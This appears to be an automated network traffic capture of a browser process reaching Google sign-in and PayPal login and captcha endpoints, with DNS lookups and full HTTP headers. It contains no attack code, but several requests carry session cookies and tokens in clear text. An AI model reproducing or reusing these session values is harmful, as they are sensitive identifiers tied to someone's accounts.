GET

https://i.ytimg.com/generate_204

MicrosoftEdgeCP.exe

Remote address:

142.251.39.118:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 204

content-length: 0
cross-origin-resource-policy: cross-origin
date: Mon, 30 Oct 2023 06:49:36 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

118.39.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.39.251.142.in-addr.arpa

IN PTR

Response

118.39.251.142.in-addr.arpa

IN PTR

ams15s48-in-f221e100net
DNS

84.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.65.42.20.in-addr.arpa

IN PTR

Response
DNS

accounts.google.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:YUFW61I-sF8aYiOEBdmv-xOvFSoJsA:vqSeBwieYT7y_CQL

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
set-cookie: __Host-GAPS=1:H0pAxJMwCoFHeYuqadS7exfWb6MgrA:RzlhkCIkNOEMbV-v; Expires=Wed, 29-Oct-2025 06:49:52 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:49:52 GMT
strict-transport-security: max-age=31536000; includeSubDomains
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
cross-origin-resource-policy: same-site
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

www.paypal.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.paypal.com

IN A

Response

www.paypal.com

IN CNAME

www.glb.paypal.com

www.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
POST

https://www.paypal.com/auth/validatecaptcha

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /auth/validatecaptcha HTTP/2.0
host: www.paypal.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypal.com/signin
accept-language: en-US
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
content-length: 965
cache-control: no-cache
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU3MjE4OSIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-KAJ+v0lxeP21WXRNfwIrN8/i9MSvyfn7QPFMsBMlxDzvkVkT' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: text/html; charset=utf-8
date: Mon, 30 Oct 2023 06:49:53 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"1ae7-zcHPQAaH6rk3c6er3ZamLC61klw"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 080b734a5b400
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CA6)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:49:53 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:35:49 GMT; HttpOnly; Secure
set-cookie: htdebug=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: tsrce=authchallengenodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Thu, 02 Nov 2023 06:49:52 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5MzAyNyIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg13.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:53 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342992%26vteXpYrS%3D1698650392%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:53 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:53 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-0000000000000000000080b734a5b400-519632b792721c63-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
accept-encoding: gzip, deflate, br
content-length: 507
cache-control: no-cache
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5MzAyNyIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; l7_az=dcg13.slc; ts=vreXpYrS%3D1793342992%26vteXpYrS%3D1698650392%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-VvgLcN9uGvpLn79lrDS+vIidW1FgFDFjQT3XBaGzHhIjY5H3' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"773-KHrB4cSi39IlSYQF2aVt80bXaHg"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 0001ab133841b
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CAC)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:49:54 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:35:50 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5NDUyNCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg13.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:54 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342994%26vteXpYrS%3D1698650394%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:54 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:54 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000001ab133841b-ae73fa560af8887d-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
accept-encoding: gzip, deflate, br
content-length: 538
cache-control: no-cache
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5NDUyNCIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; l7_az=dcg13.slc; ts=vreXpYrS%3D1793342994%26vteXpYrS%3D1698650394%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-vTvV4Z12X3CYokD/y8dzHmm94FWMI7XQsDBTHPdMD36rbKHx' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:49:57 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"771-P5c4p2WSrTaB8Uz6I4zO5N76HPI"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 008ba72656102
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4C92)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:49:57 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:35:53 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5NzMxMSIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg13.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:57 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342997%26vteXpYrS%3D1698650397%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:57 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:57 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-0000000000000000000008ba72656102-795527bbef0de46e-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/csplog/api/log/csp

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /csplog/api/log/csp HTTP/2.0
host: www.paypal.com
accept: */*
content-type: application/csp-report
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-length: 2276
cache-control: no-cache
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5NzMxMSIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; l7_az=dcg13.slc; ts=vreXpYrS%3D1793342997%26vteXpYrS%3D1698650397%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypalobjects.com; script-src 'nonce-Lj1TQ6Dh8dbaDGlY48QJGap+BCWvYdAqvw+8lpldfG6eYapg' 'self' https://*.paypal.com https://*.paypalobjects.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypalobjects.com; img-src https://*.paypal.com https://*.paypalobjects.com; object-src 'none'; font-src 'self' https://*.paypalobjects.com; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp; frame-src 'self' https://*.paypal.com https://*.paypalobjects.com https://*.qualtrics.com; connect-src 'self' https://*.paypal.com https://*.paypalobjects.com https://*.qualtrics.com;
content-type: text/plain; charset=utf-8
date: Mon, 30 Oct 2023 06:49:59 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 0b88b07853666
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4C87)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:49:59 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:35:55 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5OTY3OCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: tsrce=cspreportnodeweb; Domain=.paypal.com; Path=/; Expires=Thu, 02 Nov 2023 06:49:59 GMT; HttpOnly; Secure; SameSite=None
set-cookie: l7_az=dcg13.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:59 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342999%26vteXpYrS%3D1698650399%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:59 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:59 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000b88b07853666-51e3e1b995675305-01
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-length: 2
DNS

www.paypalobjects.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.paypalobjects.com

IN A

Response

www.paypalobjects.com

IN CNAME

ppo.glb.paypal.com

ppo.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v2.html?siteKey=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&locale.x=en_US&country.x=US&checkConnectionTimeout=10000&reCaptchaEnterpriseEnabled=true

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v2.html?siteKey=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&locale.x=en_US&country.x=US&checkConnectionTimeout=10000&reCaptchaEnterpriseEnabled=true HTTP/2.0
host: www.paypalobjects.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
cache-control: max-age=31536000, s-maxage=31536000
content-type: text/html
date: Mon, 30 Oct 2023 06:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fe-1c15"
expires: Tue, 29 Oct 2024 06:49:54 GMT
last-modified: Wed, 04 Oct 2023 15:25:50 GMT
paypal-debug-id: 53699f07f1e63
server: ECAcc (ama/48F2)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000053699f07f1e63-c94ce2e4af0f7b17-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 2134
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/backbone-0.9.2.js

